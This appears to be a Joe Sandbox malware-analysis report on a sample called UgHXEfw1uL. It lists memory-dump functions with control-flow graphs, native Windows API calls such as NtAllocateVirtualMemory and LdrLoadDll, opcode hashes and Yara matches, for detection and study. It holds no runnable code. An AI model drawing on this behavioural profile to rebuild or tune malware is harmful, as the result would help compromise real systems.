                                          • API String ID: 2738559852-782607585
                                          • Opcode ID: 7d81298f37708454fe36051a0b19a8663e079e7aae2f52e55b683db97231eb52
                                          • Instruction ID: 5f5c384a850a33f48e31aee8c8964862e0f66c101092c9726f3ec3f83ad86f8a
                                          • Opcode Fuzzy Hash: 7d81298f37708454fe36051a0b19a8663e079e7aae2f52e55b683db97231eb52
                                          • Instruction Fuzzy Hash: 51F03AB6200049ABCB08DF98C880CEB77ADEF8C314B198649FD1CA3205C630E855CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 242 40acf0-40ad19 call 41cc50 245 40ad1b-40ad1e 242->245 246 40ad1f-40ad2d call 41d070 242->246 249 40ad3d-40ad4e call 41b4a0 246->249 250 40ad2f-40ad3a call 41d2f0 246->250 255 40ad50-40ad64 LdrLoadDll 249->255 256 40ad67-40ad6a 249->256 250->249 255->256
                                          APIs
                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2121827680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_UgHXEfw1uL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Load
                                          • String ID:
                                          • API String ID: 2234796835-0
                                          • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                          • Instruction ID: bd03027937dafe21d6f438616a486266aae6a772261e1344982784e00def1180
                                          • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                          • Instruction Fuzzy Hash: 80015EB5E0020DBBDF10DBA1DC42FDEB3789F54308F0045AAA908A7281F634EB548B95
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 257 41a360-41a3b1 call 41af60 NtCreateFile
                                          APIs
                                          • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2121827680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_UgHXEfw1uL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                          • Instruction ID: 1571a74e51eef41835f20cf1113afde9e84efeac6e640e2865a3d9423fa4fe5b
                                          • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                          • Instruction Fuzzy Hash: FEF0BDB2201208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 269 41a53b-41a556 270 41a55c-41a57d NtAllocateVirtualMemory 269->270 271 41a557 call 41af60 269->271 271->270
                                          APIs
                                          • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2121827680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_UgHXEfw1uL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateMemoryVirtual
                                          • String ID:
                                          • API String ID: 2167126740-0
                                          • Opcode ID: ac997fc6fc0c01afdfe400c9999fd9f8afcb9c96f5aaf7675eae2f0a0288d9fb
                                          • Instruction ID: 8a40d246b45b9bb42d74d366c08b5473b86aa9edf13011dae55a113455b40b06
                                          • Opcode Fuzzy Hash: ac997fc6fc0c01afdfe400c9999fd9f8afcb9c96f5aaf7675eae2f0a0288d9fb
                                          • Instruction Fuzzy Hash: EFF015B2210208AFDB18DF89DC81EEB77BDEF8C754F158159BE4897241C630E911CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 272 41a540-41a57d call 41af60 NtAllocateVirtualMemory
                                          APIs
                                          • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2121827680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_UgHXEfw1uL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateMemoryVirtual
                                          • String ID:
                                          • API String ID: 2167126740-0
                                          • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                          • Instruction ID: 60dc777ab2a5703fe93ec60752bbea5a413bae98553eb5929f98badcd8fbe991
                                          • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                          • Instruction Fuzzy Hash: B2F015B2200208ABCB14DF89CC81EEB77ADEF8C754F158149BE0897241C630F811CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2121827680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_UgHXEfw1uL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Close
                                          • String ID:
                                          • API String ID: 3535843008-0
                                          • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                          • Instruction ID: a008c5d5ec14fa9f5013d94ab86a46559dd82bf248144eb087863a0ac6a31d62
                                          • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                          • Instruction Fuzzy Hash: F7D01776200218ABD710EB99CC85EE77BACEF48B64F158499BA1C9B242C530FA1086E0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 281632a2f927b4ca554958e92b8dce1ca72b05e3b791daa7af053c455024cc66
                                          • Instruction ID: 93e70c8ffee2d561de7eac3ff201355cfd34bfb817f10b4ad791e5409a7180ac
                                          • Opcode Fuzzy Hash: 281632a2f927b4ca554958e92b8dce1ca72b05e3b791daa7af053c455024cc66
                                          • Instruction Fuzzy Hash: 3D900225251400131205B5584708507004687D5391355C033F1055550DDA2589626122
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 98340e807bd565155251c83139248a8168ac70db1b5ef3ac743e282a28ce5c3a
                                          • Instruction ID: bf1c8f6a241f2e9b0d293739941b17760972a386bca5d56ca97d850320455340
                                          • Opcode Fuzzy Hash: 98340e807bd565155251c83139248a8168ac70db1b5ef3ac743e282a28ce5c3a
                                          • Instruction Fuzzy Hash: AE90023124140812E2807158840864A000587D1341F95C037A0065654ECE198B5A77A2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 5452b824174745ed3df9c6f5d39a7b9f4c40ef95bb15c0f72a064d733aeb8e6e
                                          • Instruction ID: ca2b51e8be75aa6aa9ac3ca303d9967ac782de27cdc6eba758fa0199c8571047
                                          • Opcode Fuzzy Hash: 5452b824174745ed3df9c6f5d39a7b9f4c40ef95bb15c0f72a064d733aeb8e6e
                                          • Instruction Fuzzy Hash: E490026124240013520571588418616400A87E0341B55C033E1054590EC92989927126
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 965f9645d7ff8c66aaee2eda09df9bbcae1b469471636f0a498ae1ab293331f3
                                          • Instruction ID: 13a58f6e5183360f532e2b4a6c0bdc1eccd561a9b81230311e4348f44f9f2208
                                          • Opcode Fuzzy Hash: 965f9645d7ff8c66aaee2eda09df9bbcae1b469471636f0a498ae1ab293331f3
                                          • Instruction Fuzzy Hash: 5890023124140412E2007598940C646000587E0341F55D033A5064555FCA6989927132
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 0ebffb57aaa6b640ba3380b5a29c1233b2ba5068aceb5f4be65d38a07b51c9ed
                                          • Instruction ID: 91ae6f459ce4739a81defcc8a54511ffff13000f16931655db04e959ffd34b20
                                          • Opcode Fuzzy Hash: 0ebffb57aaa6b640ba3380b5a29c1233b2ba5068aceb5f4be65d38a07b51c9ed
                                          • Instruction Fuzzy Hash: F790023124148812E2107158C40874A000587D0341F59C433A4464658E8A9989927122
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 038a4add2bbf4409a0bde6e7631bcc886d1f4cd5b4a8ccb0bc6a87db12727333
                                          • Instruction ID: 286c91b374c4acc1743f07b80c5faaa198a5cb20f613d4ea1038a2b21997effc
                                          • Opcode Fuzzy Hash: 038a4add2bbf4409a0bde6e7631bcc886d1f4cd5b4a8ccb0bc6a87db12727333
                                          • Instruction Fuzzy Hash: 1990023124140423E21171588508707000987D0381F95C433A0464558E9A5A8A53B122
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: dd5d03a993a8406b5af05a0e21739c10790a87a18b862a8efd074e0f4a8cfb72
                                          • Instruction ID: daedb5fd7da95a45a10d071d7557fcd0f02d5c459855572c94f00f07519ece8d
                                          • Opcode Fuzzy Hash: dd5d03a993a8406b5af05a0e21739c10790a87a18b862a8efd074e0f4a8cfb72
                                          • Instruction Fuzzy Hash: 05900221282441626645B1588408507400697E0381795C033A1454950D892A9957E622
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 1244a44cf26a6d7a3c0ffee3fa189fa6b9ec3e403f0077aff5e026a61e028792
                                          • Instruction ID: 3e5800e7e4e1d0f24035f2659bb6f17f964621412465bc685519163ff4843bff
                                          • Opcode Fuzzy Hash: 1244a44cf26a6d7a3c0ffee3fa189fa6b9ec3e403f0077aff5e026a61e028792
                                          • Instruction Fuzzy Hash: EB90022134140013E2407158941C6064005D7E1341F55D033E0454554DDD1989576223
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: b133e18f205db776bb9b79716ee1064667cefe8d70e9c3d6049c6d999cd31ac9
                                          • Instruction ID: 6f1f351e9c040753b1ab85d26febedeb633d7ff00839d87121f7bf8e0ad3c338
                                          • Opcode Fuzzy Hash: b133e18f205db776bb9b79716ee1064667cefe8d70e9c3d6049c6d999cd31ac9
                                          • Instruction Fuzzy Hash: 9190022925340012E2807158940C60A000587D1342F95D437A0055558DCD19896A6322
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 2729cd37ed7eeab2121b1ff163b81fc0dca6e6dd83af35997b87d7c82e442164
                                          • Instruction ID: ee74edc0e2ca57655a06dbe5ae0dcaf0031bfcc0a5486fca504c72f7e97fcba6
                                          • Opcode Fuzzy Hash: 2729cd37ed7eeab2121b1ff163b81fc0dca6e6dd83af35997b87d7c82e442164
                                          • Instruction Fuzzy Hash: 2790027124140412E24071588408746000587D0341F55C033A50A4554F8A5D8ED67666
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 651f52961dbe6220ad0fddd2c0df5e50750ca153985afe658b98300951bddd71
                                          • Instruction ID: 9462c04dc163d67bc344eea22fce073011adbc79f995917182522c7e890362bd
                                          • Opcode Fuzzy Hash: 651f52961dbe6220ad0fddd2c0df5e50750ca153985afe658b98300951bddd71
                                          • Instruction Fuzzy Hash: 6D90022164140512E20171588408616000A87D0381F95C033A1064555FCE298A93B132
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: b05cc6077a0d1d1b5a82739851aa9f10ce4820c39bfae088337389a9b4a79292
                                          • Instruction ID: 6320a6a81f26006ee3e6318b8e368d56ea161dea1def7ea876c0e066592c0b2c
                                          • Opcode Fuzzy Hash: b05cc6077a0d1d1b5a82739851aa9f10ce4820c39bfae088337389a9b4a79292
                                          • Instruction Fuzzy Hash: E1900221251C0052E30075688C18B07000587D0343F55C137A0194554DCD1989626522
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 45d56114ba100fe378f436447b9090073f41bdf1106c13c4380a73f6d86bc9ad
                                          • Instruction ID: cdf0908f2c18555c575a8bb9b708ba068f2e722cc5b00731d83707853496c3fa
                                          • Opcode Fuzzy Hash: 45d56114ba100fe378f436447b9090073f41bdf1106c13c4380a73f6d86bc9ad
                                          • Instruction Fuzzy Hash: E79002216414005252407168C8489064005ABE1351755C133A09D8550E895D89666666
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 649a7eb9ec40750d5ab5808a20572928e6d38a30b54d119dc4df3f23c0046a46
                                          • Instruction ID: 95bce1bfdf8cc36ee1047b99139e530bf9b995dcf75e7d29742b52030ae435d8
                                          • Opcode Fuzzy Hash: 649a7eb9ec40750d5ab5808a20572928e6d38a30b54d119dc4df3f23c0046a46
                                          • Instruction Fuzzy Hash: 9890023124180412E2007158881870B000587D0342F55C033A11A4555E8A2989527572
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 58a715d351511abad0fdc40462c318c9601b740f7d85e76feacd3c7f04f3cf79
                                          • Instruction ID: 768cecf97923f5a01ffd62a66e904b53ed212fa8152e607ea1e0d5c9c4e5c5b1
                                          • Opcode Fuzzy Hash: 58a715d351511abad0fdc40462c318c9601b740f7d85e76feacd3c7f04f3cf79
                                          • Instruction Fuzzy Hash: 4290026138140452E20071588418B060005C7E1341F55C037E10A4554E8A1DCD537127
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2121827680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_UgHXEfw1uL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
                                          • Instruction ID: 0b46cc9625fd597f0f1293e0fe630cc8c1f9f1e3f005c30533d49d025d22dd75
                                          • Opcode Fuzzy Hash: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
                                          • Instruction Fuzzy Hash: 97210AB2D4020857CB25D674AD52BFF73BCAB54314F04007FE949A3182F638BE498BA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 14 41a630-41a661 call 41af60 RtlAllocateHeap
                                          APIs
                                          • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A65D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2121827680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_UgHXEfw1uL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID: 6EA
                                          • API String ID: 1279760036-1400015478
                                          • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                          • Instruction ID: b63900df46c74d48569035b2bcc9be016157083d4ef88d1b541c797289a4eec1
                                          • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                          • Instruction Fuzzy Hash: 46E012B1200208ABDB14EF99CC41EA777ACEF88664F158559BA085B242C630F9118AB0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 212 408308-40835a call 41be60 call 41ca00 call 40acf0 call 414e50 221 40835c-40836e PostThreadMessageW 212->221 222 40838e-408392 212->222 223 408370-40838a call 40a480 221->223 224 40838d 221->224 223->224 224->222
                                          APIs
                                          • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2121827680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_UgHXEfw1uL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: MessagePostThread
                                          • String ID:
                                          • API String ID: 1836367815-0
                                          • Opcode ID: 0563053f0573ac6ab7742af02ff3a48faf6cae1d49adfc8e7b5d837c8a2a2f45
                                          • Instruction ID: 2d9b4199cae91d1dc262d36cc6b423f2551d1643d88dfb98700dbce2f09cc2c9
                                          • Opcode Fuzzy Hash: 0563053f0573ac6ab7742af02ff3a48faf6cae1d49adfc8e7b5d837c8a2a2f45
                                          • Instruction Fuzzy Hash: 69018832A8032877E721AA959C43FFE772C9F40F54F050159FF04BA1C2E6B8690647EA
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 227 408310-40831f 228 408328-40835a call 41ca00 call 40acf0 call 414e50 227->228 229 408323 call 41be60 227->229 236 40835c-40836e PostThreadMessageW 228->236 237 40838e-408392 228->237 229->228 238 408370-40838a call 40a480 236->238 239 40838d 236->239 238->239 239->237
                                          APIs
                                          • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2121827680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_UgHXEfw1uL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: MessagePostThread
                                          • String ID:
                                          • API String ID: 1836367815-0
                                          • Opcode ID: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
                                          • Instruction ID: fe648ddaccc693dff6b318d6e20673cc1517f8ca6da234ac2c2ad493b9bfa733
                                          • Opcode Fuzzy Hash: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
                                          • Instruction Fuzzy Hash: FF018431A8032C76E721A6959C43FFE776C5B40F54F05011AFF04BA1C2EAA8690546EA
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 260 41a5f6-41a5f7 261 41a667-41a6d8 call 41af60 ExitProcess 260->261 262 41a5f9-41a62d call 41af60 260->262
                                          APIs
                                          • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6D8
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2121827680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_UgHXEfw1uL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExitProcess
                                          • String ID:
                                          • API String ID: 621844428-0
                                          • Opcode ID: 2d6ca17097843893513ddd1089c93f56ff2228a0e10bfb84838aab15381067b1
                                          • Instruction ID: b2ae5b0e20afae61de36e7d83a417c2b0fa83cf4d964cd6b940c2c355a5d6c6d
                                          • Opcode Fuzzy Hash: 2d6ca17097843893513ddd1089c93f56ff2228a0e10bfb84838aab15381067b1
                                          • Instruction Fuzzy Hash: 42F0B4B5501304AFCA14DF64CC8AEE77768EF44324F18844ABC485B252D535EA21CBA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 275 41a6a3-41a6ae 277 41a6b0-41a6b6 275->277 278 41a6b8-41a6c9 275->278 277->278 279 41a6cf-41a6d8 ExitProcess 278->279 280 41a6ca call 41af60 278->280 280->279
                                          APIs
                                          • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6D8
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2121827680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_UgHXEfw1uL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExitProcess
                                          • String ID:
                                          • API String ID: 621844428-0
                                          • Opcode ID: e3974ad6bfde15aef9f094d55b8f48f3eb60503ad3ddd1a45bccbc5c5726ab2a
                                          • Instruction ID: f41919a958d3a02f5f8240361791514d173b3c4861e1cebeae5460b613b45959
                                          • Opcode Fuzzy Hash: e3974ad6bfde15aef9f094d55b8f48f3eb60503ad3ddd1a45bccbc5c5726ab2a
                                          • Instruction Fuzzy Hash: 2BE0D8702453047FC7319B598C85FD73B589F09720F194696B9595B2C2D530AE1086EA
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 281 41a670-41a6a1 call 41af60 RtlFreeHeap
                                          APIs
                                          • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2121827680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_UgHXEfw1uL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                          • Instruction ID: 086aab0bc8c344d6c60c9bbd5a0512cabfd8005857d16272e4a7e29987098a06
                                          • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                          • Instruction Fuzzy Hash: C1E012B1200208ABDB18EF99CC49EA777ACEF88764F118559BA085B242C630E9108AB0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2121827680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_UgHXEfw1uL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: LookupPrivilegeValue
                                          • String ID:
                                          • API String ID: 3899507212-0
                                          • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                          • Instruction ID: 3f9aab8e47c10174471559fee5d267dc63a882ce56825bdd12c8e63267ac542a
                                          • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
